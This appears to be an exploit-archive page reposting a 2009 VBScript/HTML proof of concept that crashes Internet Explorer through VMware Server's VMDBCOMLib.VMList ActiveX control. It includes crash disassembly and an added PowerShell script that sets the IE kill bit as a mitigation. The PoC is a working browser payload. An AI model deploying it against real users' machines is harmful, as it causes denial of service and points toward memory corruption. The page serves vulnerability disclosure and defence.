VMware COM DB ActiveX Remote Buffer Overflow Exploit
Source: www.vfcocus.net  Author: cN4phux  Published: 2009-01-09

<html>
<!--
                    << Bug discovered by cN4phux >>     a small GHH from DZ.
# VMware COM DB ActiveX Remote Buffer Overflow Exploit
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
# Tested on Windows XP Professional SP2 with Internet Explorer 6.x.x
#
#  CLSID       = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
#  progID      = "VMDBCOMLib.VMList"
#  member_name = "Initialize"
#  Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll"
#
# Vulnerable method (crashes IE, denial of service): Initialize()
#
# Block disassembly around the faulting instruction:
    111AE667 RETN
    111AE668 MOV EAX,[EBP+C]
    111AE66B PUSH EBX
    111AE66C PUSH EDI
    111AE66D PUSH EAX
    111AE66E MOV [ESI+4],EAX
    111AE671 CALL [EAX]        <-- the access violation happens here
    111AE673 MOV EBX,[EBP+8]
    111AE676 PUSH 1133D9D0
    111AE67B PUSH EBX
    111AE67C CALL 111AF800
    111AE681 MOV EDI,EAX
    111AE683 ADD ESP,C
    111AE686 TEST EDI,EDI
    111AE688 JL 111AE731

  Exception Code: ACCESS_VIOLATION
  Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)

# Greetz to friends: Blub, Zigma, Heurs, djug & etc . . .
-->

<!-- Instantiate the control by CLSID so its methods are reachable from script -->
<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA' id='VMware_function'></object>
<input language=VBScript onclick=Buffer_Act() type=button value='Click here to start the crash DOS'>
<script language='vbscript'>
 Sub Buffer_Act
  ' First argument: -2147483647 is 0x80000001 as a signed 32-bit integer
  buff_1 = -2147483647
  buff_2 = 1
  ' Unused by the published PoC (a single 0x90 byte); kept as in the original
  buff_3 = unescape("%90")
  ' Calling Initialize with these arguments triggers the access violation
  VMware_function.Initialize buff_1, buff_2
 End Sub
</script>
</html>
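The PoC above reaches the control through `<object classid=...>` in Internet Explorer, so the practical mitigation on an affected host is the IE kill bit: a `Compatibility Flags` DWORD with bit 0x400 (COMPAT_EVIL_DONT_LOAD) set under the `ActiveX Compatibility` key for the control's CLSID. The following script is an added example for this page, not part of cN4phux's PoC or of any VMware code; it assumes an elevated PowerShell (2.0 or later) on the Windows host with VMware Server installed, reads the CLSID from the PoC, and uses the standard CATID_SafeForScripting / CATID_SafeForInitializing category GUIDs to report whether the control is registry-marked as scriptable. The Wow6432Node path is only consulted when that hive exists (64-bit hosts).

```powershell
# Added example for this page; not part of cN4phux's PoC or of VMware's code.
# Reports whether the VMDBCOMLib.VMList control is registered and marked safe
# for scripting, then sets the IE kill bit so <object classid=...> refuses to
# load it. Run from an elevated PowerShell on the affected Windows host.

$clsid       = '{8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA}'   # from the PoC's <object classid>
$killBitFlag = 0x400                                       # COMPAT_EVIL_DONT_LOAD

# Component categories IE consults when deciding whether a control may be scripted.
# (A control may instead answer IObjectSafety at run time, which a registry check
# cannot see, so "not marked" is not proof that IE will refuse to script it.)
$categories = @(
    @{ Name = 'SafeForScripting';    Guid = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}' },
    @{ Name = 'SafeForInitializing'; Guid = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}' }
)

$compatRoot  = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
$compatPaths = @("$compatRoot\$clsid")
# Assumption: on 64-bit Windows the 32-bit IE reads the Wow6432Node hive as well.
$wowRoot = 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') { $compatPaths += "$wowRoot\$clsid" }

function Get-CompatFlags([string]$Path) {
    # Returns the current Compatibility Flags value, or 0 if the key/value is absent.
    if (-not (Test-Path $Path)) { return 0 }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit([string]$Path) {
    return ((Get-CompatFlags $Path) -band $killBitFlag) -ne 0
}

function Set-KillBit([string]$Path) {
    # OR the kill bit into whatever flags are already there rather than overwriting them.
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $flags = (Get-CompatFlags $Path) -bor $killBitFlag
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $flags -Type DWord
}

# 1. Is the control registered at all?
$clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid"
if (-not (Test-Path $clsidKey)) {
    Write-Host "CLSID $clsid is not registered; nothing for IE to instantiate."
} else {
    $server = (Get-ItemProperty -Path "$clsidKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    Write-Host "Control registered, InprocServer32 = $server"

    # 2. Is it marked safe for scripting / initializing via component categories?
    foreach ($cat in $categories) {
        $marked = Test-Path "$clsidKey\Implemented Categories\$($cat.Guid)"
        Write-Host ("  {0}: {1}" -f $cat.Name, $(if ($marked) { 'marked' } else { 'not marked' }))
    }
}

# 3. Set the kill bit (in every applicable hive) so IE will not load the control.
foreach ($p in $compatPaths) {
    if (Test-KillBit $p) {
        Write-Host "Kill bit already set: $p"
    } else {
        Set-KillBit $p
        Write-Host ("Kill bit set: {0} (flags now 0x{1:X})" -f $p, (Get-CompatFlags $p))
    }
}
```

The kill bit closes only the browser vector: the DLL remains registered and any other COM client can still call `Initialize`, so updating or unregistering the control is the real fix. Note also that the PoC records only `ACCESS_VIOLATION` at an indirect `CALL [EAX]`; whether the fault is limited to a crash depends on what EAX holds at that instruction, which the published notes do not show, so treat the DoS label as the floor rather than the ceiling.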
